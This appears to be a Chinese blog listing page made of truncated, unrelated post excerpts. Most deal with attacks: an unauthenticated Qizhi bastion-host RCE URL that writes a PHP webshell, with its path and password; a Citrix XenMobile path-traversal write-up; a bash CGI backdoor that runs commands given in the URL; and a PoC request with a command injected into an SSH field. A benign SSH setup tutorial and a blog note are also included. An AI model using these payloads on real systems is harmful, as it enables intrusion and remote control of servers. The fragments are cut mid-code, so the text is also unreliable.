一、齐治堡垒机前远程命令执行漏洞（CNVD-2019-20835） 1、访问 http://10.20.10.11/listener/cluster_manage.php :返回 “OK”.（未授权无需登录） 2、访问如下链接即可获得getshell，执行成功后，生成PHP一句话马 https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YW 3.getshell访问路径： /var/www/shterm/resources/qrcode/lbj77.php https://10.20.10.10/shterm/resources/qrcode/lbj77.php(密码10086) 据说还是另外一个版本是java的: POST /shterm/listener/tui_update.phpa=["t';import os;os.popen('whoam ...

Citrix Endpoint Management（也称为XenMobile）用于管理员工的移动设备和移动应用程序。通常，由于Active Directory集成，它部署在网络外围并可以访问内部网络。这使XenMobile成为安全研究的主要目标。 在此类研究中，发现了路径遍历漏洞。此漏洞允许未经授权的用户读取任意文件，包括包含密码的配置文件。 CVE-2020-8209 –路径遍历利用此漏洞，可以读取Web服务器根目录之外的任意文件，包括配置文件和敏感的加密密钥。剥削不需要授权。在文件help-sb-download.jsp中标识了易受攻击的代码： <% String sbFilePath="/opt/sas/support/"; int length = 0; String sbFileName=(String)request.getParameter("sbFileName"); ServletOutputStream outStream = response.getOutputStream(); response.setHeade ...

https://github.com/zbnio/zbn

cd /tmpmkdir cgi-binecho '#!/bin/bash' > ./cgi-bin/backdoor.cgiecho 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgiecho 'echo -e $($1)' >> ./cgi-bin/backdoor.cgichmod +x ./cgi-bin/backdoor.cgi python -m http.server --cgiwget -q -O - "http://localhost:8000/cgi-bin/backdoor.cgi?whoami"student

PoC： POST /run HTTP/1.1Host: 127.0.0.1:8000User-Agent: Mozilla/5.0Accept: application/x-yamlConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 87token=12312&client=ssh&tgt=pyn3rd&fun=a&roster=qwe&ssh_priv=aaa& open -a Calculator

本教程所有命令在POWERSHELL下运行 Config 配置config文件 cd ~\.ssh\没有就创建 C:\Users\用户名\.ssh\notepad.exe .\config或者notepad.exe C:\ProgramData\ssh\ssh_configconfig格式：Host 主机名 HostName IP/domain User username Port 22 SSH Key 配置本地密钥，已有请忽略 生成密钥ssh-keygen -t rsatype .\id_rsa.pub复制结果 配置远程密钥 首先ssh -P post username@IP/domainsudo apt-get/yum install openssh-serversudo vi /etc/ssh/sshd_config取消注释（搜索指定行）禁用密码登录，启用密钥登录sed -i "s/PasswordAuthentication yes/PasswordAuthentication no/g" /etc/ssh/sshd_con ...

博客从20_03_01开始运行 中途尝试过多种方案 现在确定使用vercel 博客文章少的可怜，因为文章不小心丢了 可以参观一下 CNBLOGS